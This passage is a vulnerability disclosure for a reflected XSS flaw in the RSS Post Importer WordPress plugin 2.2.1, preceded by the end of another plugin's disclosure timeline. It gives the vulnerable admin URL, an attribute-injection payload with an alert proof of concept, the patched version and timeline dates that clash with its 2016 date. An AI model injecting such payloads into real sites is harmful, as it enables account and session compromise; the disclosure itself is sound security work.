→ January 24, 2015  – Bug discovered, initial report to Vendor
→ January 25, 2015  – Vendor Acknowledged
→ January 27, 2015  – Vendor Deployed a Patch

Pub Ref:
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710

RSS Post Importer XSS Vulnerability

## FULL DISCLOSURE

#Product : RSS Post Importer
#Exploit Author : Rahul Pratap Singh
#Version : 2.2.1
#Home page Link : https://wordpress.org/plugins/rss-post-importer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The "full text RSS feed api key" parameter is not sanitized, which leads to reflected XSS.

—————————————-
Exploit:
—————————————-
1) Go to the following URL.
http://localhost/wp-admin/options-general.php?page=rss_pi&version=2.2.1&type=premium

2) Paste the following payload into the "full text RSS feed api key" input field.

" autofocus onclick=alert(/XSS/) "

—————————————-
POC:
—————————————-
[PoC screenshot: RSSFeedApiXSSPOC]

Fix:
Update to 2.2.3

Vulnerability Disclosure Timeline:
→ January 18, 2015  – Bug discovered, initial report to WordPress
→ January 19, 2015  – WordPress Response, plugin taken down
→ January 27, 2015  – Vendor Deployed a Patch

Pub Ref:
https://wordpress.org/plugins/rss-post-importer/changelog/